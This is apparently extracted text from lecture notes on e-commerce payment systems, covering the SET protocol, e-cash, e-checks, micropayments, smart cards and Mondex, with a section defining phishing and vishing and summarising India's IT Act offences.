Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 4
4
E-Wallet
The E-wallet is another payment scheme that operates like a carrier of e-cash and other
information
The aim is to give shoppers a single simple and secure way of carrying currency
electronically
Trust is the basis of the e-wallet as a form of electronic payment
Procedure for using an e-wallet
1 Decide on an online site where you would like to shop
2 Download a wallet from the merchantrsquos website
3 Fill out personal information such as your credit card number name address and phone
number and where merchandise should be shipped
4 When you are ready to buy click on the wallet button the buying process is fully
executed
PREPARED BY ARUN PRATAP SINGH 5
5
Smart Cards
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
Smart card Processing
PREPARED BY ARUN PRATAP SINGH 6
6
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Credit cards
It is a Plastic Card having a Magnetic Number and code on it
It has Some fixed amount to spend
Customer has to repay the spend amount after sometime
PREPARED BY ARUN PRATAP SINGH 7
7
Processing a Credit cards payment ndash
Risk in using Credit cards -
Operational Risk
Credit Risk
Legal Risk
Secure Electronic Transaction (SET) Protocol
Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM
GTE SAIC and others
Designed to provide security for card payments as they travel on the Internet
Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers
and merchants in addition to providing secure transmission
SET specification
Uses public key cryptography and digital certificates for validating both
consumers and merchants
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
